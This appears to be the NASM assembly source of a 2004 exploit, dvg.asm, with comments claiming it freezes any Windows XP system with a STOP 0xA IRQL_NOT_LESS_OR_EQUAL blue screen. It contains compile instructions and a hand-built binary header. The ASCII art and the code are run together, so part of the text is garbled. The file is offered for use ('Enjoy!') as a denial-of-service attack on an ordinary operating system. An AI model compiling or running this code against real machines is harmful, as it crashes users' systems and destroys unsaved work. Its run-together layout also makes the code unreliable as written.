; ; Legion2000 Security Research ; Assembled by iqlord 2004-09-16 ; ; David VS Goliath ::: dvg.asm ; Local WinXP (all versions) kernel (IRQL) exploit! ; ; This exploit will simulate an incompatible hard- or software, ; which will result in a system freeze with a STOP 0xA message. ; The exploit is possible because a kernel-mode process can ; access only other processes that have an IRQL lower ; than, ; or equal to, its own. Masochistically delightful don’t you think? ; _________________________________________________________________ ; ; *** STOP_MSG { <-- "IRQL_NOT_LESS_OR_EQUAL" ; MEM_ADDR <-- "REF MEM" ; KERNEL_IRQL <-- "THE KERNEL INTERRUPT REQUEST LEVEL" ; ACCESS_TYPE <-- "WE WILL USE THE READ_OPERATION" ; INST_ADDR <-- "ADDR OF INST TO REF OF MEM_ADDR" ; } ; _________________________________________________________________ ; ; COMPiLE: (Tested on NASM version 0.98.3) ; nasmw -o dvg.com -f bin -- dvg.asm ; ; Time-honoured compliments go to ; ntfx, lordhib, rattle, paris2k, zwoop, tz, sigXcpu and your moma! ; ; Enjoy! ; ; ____ org 100h; __,---' `--.__ ; ,-' ; `. dec bp; 0x4D ,' `--.`--. pop dx; 0x5A ,' `._ `-. times 0010b db 0000b; ; E V I L ; `-- ; push ax; ,-'-_ _,-~~-. ,-- `. inc bp; ;; `-,; ,'~`.__ ,;;; ; ; times 0010b db 0000b; ;; ;,' ,;; `, ;;; `. ; dec sp; `: ,' `:; __/ `.; ; ; db 0001b; ;~~^. `. `---'~~ ;; ; ; times 00001101b db 0000b; `,' `. `. .;;; ;' add al,ah; ,',^. `. `._ __ `:; ,' add [bx],cl; `-' `--' ~`--'~~`--. ~ ,' db 0000b; /;`-;_ ; ;. /. / ; ~~`-. ; db 00001011b; ; ; ; `,;`-;__;---; `----' db 0001b; ` `-`-;__;: ; ;__; times 00001110b db 0000b; `-- `-' db 01010000b add bh,bh db 0000b db 11110000b; lock! add bh,bh add al,dh times 0101b db 0000b inc ax db 0000b add al,000; offset: 0x3C times 0010b db 0000b add al,000 times 0x0A db 0000b add al,000 times 0110b db 0000b db 11011100b db 0000b db 11111111b times 1001b db 0000b db 0010b db 0000b